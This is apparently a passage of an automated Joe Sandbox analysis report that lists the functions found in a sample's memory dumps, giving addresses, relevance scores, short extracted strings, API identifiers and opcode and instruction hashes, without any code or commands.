                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                                          Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: c$
                                                                                                                                                                                                                                                                          • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                          • Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                                          • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                                                          Function 00415F66 Relevance: 1.9, Strings: 1, Instructions: 605COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: A67H
                                                                                                                                                                                                                                                                          • API String ID: 0-3389657328
                                                                                                                                                                                                                                                                          • Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                                          • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                                                                                                                                                                          Function 00AF8F35 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: [
                                                                                                                                                                                                                                                                          • API String ID: 0-3878419350
                                                                                                                                                                                                                                                                          • Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                          • Instruction ID: 3899f1bd15b8cc2684fb3924e933bb37374236444f84afda4fd97d0b7a0e0c2b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22021E752007028BCB24CF69C8D1773B7F2FF96314B19859CD9864BBA5EB39A802CB54
                                                                                                                                                                                                                                                                          Function 00B16E67 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ,)*k
                                                                                                                                                                                                                                                                          • API String ID: 0-1228391949
                                                                                                                                                                                                                                                                          • Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                                          • Instruction ID: 2f1e23eed053568e3c619baf41c1db627405c708e5c4ee7b8c824326affc3019
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2C15A75A483509BD314DF20C890ABFBBE2EBD6704F588AACE58563681DA31DC81C792
                                                                                                                                                                                                                                                                          Function 00436C00 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: ,)*k
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-1228391949
                                                                                                                                                                                                                                                                          • Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                                          • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                                                                                                                                                                                                                                          Function 00427DA2 Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: m
                                                                                                                                                                                                                                                                          • API String ID: 0-3775001192
                                                                                                                                                                                                                                                                          • Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                                          • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                                                                                                                                                                          Function 00AFC921 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                          • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                          • Instruction ID: d8144e58356f6f525c1a891fb1a2c63c10ad2351eacf584ca0b371551a5925f8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 56C14BB5D00219CBCB24CF69C8516BBB7F1FF95320F19825DE995AB790E734A842CB90
                                                                                                                                                                                                                                                                          Function 00B05BF7 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: 167H
                                                                                                                                                                                                                                                                          • API String ID: 0-2704650348
                                                                                                                                                                                                                                                                          • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                          • Instruction ID: 2f3f93599f08709b82d17f026ca403c13bf0263f7314d3f323c1f204d13f9670
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39D167726047458BE724CF28CC816ABBBD2EFD5310F19867CE9858B7D1E7359E058B82
                                                                                                                                                                                                                                                                          Function 00425990 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                          • String ID: 167H
                                                                                                                                                                                                                                                                          • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                                          • Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                          • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                                          Function 0041C6BB Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                          • Opcode ID: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                          • Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f11379e9f5da3686c670748926b93a19e55d1189e69eb2577bbd794f9e5e048
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94
                                                                                                                                                                                                                                                                          Function 00B01F77 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &#
                                                                                                                                                                                                                                                                          • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                          • Opcode ID: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                          • Instruction ID: 49b35462efebd2e68558c098e883bdb3b4bc8324c8ace3d6c682ea14ae4cefb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f12d66f6b808d20c475992f0f687e3f453dd6e3f6f88e05d52d4cafb9cead41
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5A12771A043105BDB189B68CC9667BBBE5EF91320F0985ACE89A973D1E738DD09C352
                                                                                                                                                                                                                                                                          Function 00421D10 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: &#
                                                                                                                                                                                                                                                                          • API String ID: 0-1789715784
                                                                                                                                                                                                                                                                          • Opcode ID: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                          • Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 218c5c0ac0dda5540e0c1ea4323a3af347f339793a0b8cf238deabf448903b3e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A
                                                                                                                                                                                                                                                                          Function 0041CB05 Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: .
                                                                                                                                                                                                                                                                          • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                          • Opcode ID: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                          • Instruction ID: df86e8cabfd52562b6ebe50b702b66c3677f2f48fb8aab21b174fbacb2a831e7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d6aea454a76d2159c148964020a4ba4746a54c1e6cbfad0a7af44267aa07dc3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8AB1F4B5E402128BCB248F68CC927A7B7B1FF55314F19915ED845AB790E738AC42C7D4
                                                                                                                                                                                                                                                                          Function 00AFC528 Relevance: 1.6, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: de
                                                                                                                                                                                                                                                                          • API String ID: 0-2106599819
                                                                                                                                                                                                                                                                          • Opcode ID: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                          • Instruction ID: e31396faf658e74fce60a5b824d74376c38ff109a61549a82ed501f476715bf4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 859681f232736f0ad411de2e9c44a8bd8c96edd644b44a10bf2b24b8f8322015
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6791337190C3188AC324DFA9C89266BB7F2EF91324F18992CF5D68B391F7788505C792
                                                                                                                                                                                                                                                                          Function 00AFD4D7 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ~
                                                                                                                                                                                                                                                                          • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                          • Opcode ID: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                                          • Instruction ID: 9198c0ff79b5a77ff404a50f48576ccac9219b73d89898796e665bca586bce3c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0586b10d706dca5a64b5c4dddf8e23f91b5afc25d5560ad33649bb62161a3210
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA13832A042655FC725CF688C8066AB7E2AF95324F19823DFDA99B3D1D6318C0697D1
                                                                                                                                                                                                                                                                          Function 0041D270 Relevance: 1.6, Strings: 1, Instructions: 327COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ~
                                                                                                                                                                                                                                                                          • API String ID: 0-1707062198
                                                                                                                                                                                                                                                                          • Opcode ID: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                          • Instruction ID: fb8d2d24bbcf8da77d425a74861fbc6d37f4fcabb9a6f9815e5d7f96e75daac0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 717fb99ad837fa00688aa9d47cfa2cea6a0f0870295f069540f30f335af8ffc8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2A14772E042215FCB15CE2888806ABB7D1ABD5324F19823EECB99B3D2D634DD0697D1
                                                                                                                                                                                                                                                                          Function 00426E50 Relevance: 1.6, Strings: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: RpB
                                                                                                                                                                                                                                                                          • API String ID: 0-664042118
                                                                                                                                                                                                                                                                          • Opcode ID: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                          • Instruction ID: f37ba1eb55105a71e6c02689e7a75f224f26334d47d5f70d86fb510902375083
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d81e78c847e0577fff4fe054f0d5c7df3a35ca67ad11338b1f5183c552fb7e2c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09B12532A0C391CFD314CF28E89072AB7E2BF8A711F1A4A6DE59597391C7349D45CB4A
                                                                                                                                                                                                                                                                          Function 004252BA Relevance: 1.6, Strings: 1, Instructions: 303COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1855825819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.1855825819.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: d1
                                                                                                                                                                                                                                                                          • API String ID: 0-4211392460
                                                                                                                                                                                                                                                                          • Opcode ID: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                                          • Instruction ID: 74c04020a71521c8b9984734295d0b81cdc6df3862d17ec890c7cf8b211da757
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3abdf2bcb45d9466dd71f56e8b033396586f3e76f733206a88a727156f1065f4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 409112B5618200DFD714DF24E881A7BB7A0FB8A705F84593EF48693361DB38C9158B4A
                                                                                                                                                                                                                                                                          Function 00AF77E9 Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: c$
                                                                                                                                                                                                                                                                          • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                          • Opcode ID: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                          • Instruction ID: 425fe5a10a6dc9fdfbcc0b7e4ea2ee8ba34ef60c0c6da15a7f3d8fd18afb3dd1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc3c15472f07d559a5396f8094059b7ab067923e86a285eaa48d66e2478d2574
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF91A9B0104741CFD7648F25C4A4B67BBB1FF46318F19968CD4864FBA1E379A886CB94
                                                                                                                                                                                                                                                                          Function 00B1D557 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.1856080903.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_ae0000_3247.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID: ihgf
                                                                                                                                                                                                                                                                          • API String ID: 0-2948842496
                                                                                                                                                                                                                                                                          • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                          • Instruction ID: a40a6b3b13c2d979b31546e34f76056bdd12af83a442d50d1a7cd48d165b58e2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C181A0746042019FD715DF28C881AABB7F2FF99314F5996ACE5858B3A1DB31EC81CB42
